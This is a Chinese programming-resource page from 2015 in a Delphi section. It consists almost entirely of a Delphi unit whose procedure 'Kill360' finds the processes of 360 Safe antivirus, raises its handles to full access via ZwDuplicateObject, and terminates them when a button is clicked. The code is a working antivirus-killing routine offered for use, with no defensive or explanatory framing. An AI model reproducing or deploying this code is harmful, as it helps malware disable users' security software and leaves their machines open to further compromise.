主页 > 编程资料 > Delphi >
发布时间:2015-09-22 作者:网络 阅读:114次

unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,TlHelp32;
type
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt):LongInt stdcall; external 'NTDLL.DLL' name 'ZwDuplicateObject';
implementation
{$R *.dfm}
procedure Kill360();
const
Safepro:array[1..4] of PChar =('safeboxTray.exe','360Safe.exe','360safebox.exe','360tray.exe');
var
ContinueLoop : BOOL;
FSnapshotHandle : THandle;
pe : PROCESSENTRY32;
ProcessHandle:Longint;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe.dwSize:=SizeOf(PROCESSENTRY32);
if (Process32First(FSnapshotHandle,pe)) then
begin
while (Process32Next(FSnapshotHandle,pe)) do
begin
if (UpperCase(ExtractFileName(pe.szExeFile))=UpperCase(Safepro[1])) or (UpperCase(ExtractFileName(pe.szExeFile))=UpperCase(Safepro[2])) or (UpperCase(ExtractFileName(pe.szExeFile))=UpperCase(Safepro[3])) or (UpperCase(ExtractFileName(pe.szExeFile))=UpperCase(Safepro[4])) then
begin
ProcessHandle:=OpenProcess($400, False,pe.th32ProcessID);
ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1);
TerminateProcess(ProcessHandle,0);
end;
end;
end;
CloseHandle(FSnapshotHandle);
End;
procedure TForm1.Button1Click(Sender: TObject);
begin
Kill360();
end;
end.
关键字词: